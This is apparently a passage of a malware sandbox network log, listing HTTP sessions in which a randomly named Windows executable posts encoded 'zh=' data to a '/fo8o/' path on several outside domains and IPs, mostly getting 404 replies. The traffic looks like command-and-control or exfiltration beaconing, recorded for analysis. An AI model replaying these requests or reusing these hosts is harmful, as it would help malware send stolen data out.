                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                            Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                            15          192.168.2.11  49990        66.29.149.46    80                3796  C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            Nov 25, 2024 14:00:03.154845953 CET  1809  OUT  POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.techchains.info
                                                                            Origin: http://www.techchains.info
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 1231
                                                                            Referer: http://www.techchains.info/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 6c 4d 79 77 42 4d 77 32 39 50 42 42 6b 57 43 67 36 35 42 57 38 71 68 53 34 62 52 2b 34 76 2f 71 6c 59 78 49 79 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 57 57 37 4e 75 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 6f 4c [TRUNCATED]
                                                                            Data Ascii: zh=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 [TRUNCATED]
                                                                            Nov 25, 2024 14:00:04.695288897 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:04 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            16 | 192.168.2.11 | 49991 | 66.29.149.46 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 14:00:05.803013086 CET | 508 | OUT | GET /fo8o/?zh=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa481lrDHTJpcFWPIOqV4sO7fmSS56YSbpU=&HpnH2=lZrlsdK8B4Q HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.techchains.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 25, 2024 14:00:07.086117983 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:06 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            17 | 192.168.2.11 | 49992 | 195.110.124.133 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 14:00:13.170790911 CET | 794 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 6a 6a 31 59 33 6f 63 6d 41 4e 4b 41 2f 57 70 73 57 64 5a 74 54 69 7a 55 70 74 74 47 63 72 37 79 6e 77 3d 3d
                                                                            Data Ascii: zh=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCjj1Y3ocmANKA/WpsWdZtTizUpttGcr7ynw==
                                                                            Nov 25, 2024 14:00:14.523360014 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:14 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            18 | 192.168.2.11 | 49993 | 195.110.124.133 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 14:00:15.818893909 CET | 814 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 37 57 39 4c 4d 32 56 61 65 37 38 34 48 31 4a 4c 77 74 36 76 72 54 69 5a 71 79 4c 4b 47 4c 79 70 55 3d
                                                                            Data Ascii: zh=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qx7W9LM2Vae784H1JLwt6vrTiZqyLKGLypU=
                                                                            Nov 25, 2024 14:00:17.173274994 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:16 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            19 | 192.168.2.11 | 49994 | 195.110.124.133 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 14:00:18.473773956 CET | 1827 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 1231
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 53 66 2f 2f 71 30 53 65 49 71 75 39 59 76 43 4b 61 34 43 35 6f 76 44 76 4d 6e 39 54 72 53 68 71 4f 48 2b 75 48 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 55 52 70 75 4d 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 75 76 [TRUNCATED]
                                                                            Data Ascii: zh=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 [TRUNCATED]
                                                                            Nov 25, 2024 14:00:19.957062960 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:19 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            20 | 192.168.2.11 | 49995 | 195.110.124.133 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 14:00:21.129354000 CET | 514 | OUT | GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.elettrosistemista.zip
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 25, 2024 14:00:22.539127111 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:22 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            21 | 192.168.2.11 | 49996 | 217.196.55.202 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 14:00:44.956372976 CET | 782 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 76 39 31 72 6c 4f 32 6e 39 6f 4c 61 47 32 41 39 46 7a 47 48 47 79 56 53 31 58 6a 33 52 2b 57 52 6b 41 3d 3d
                                                                            Data Ascii: zh=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Jv91rlO2n9oLaG2A9FzGHGyVS1Xj3R+WRkA==
                                                                            Nov 25, 2024 14:00:46.264550924 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Mon, 25 Nov 2024 13:00:46 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
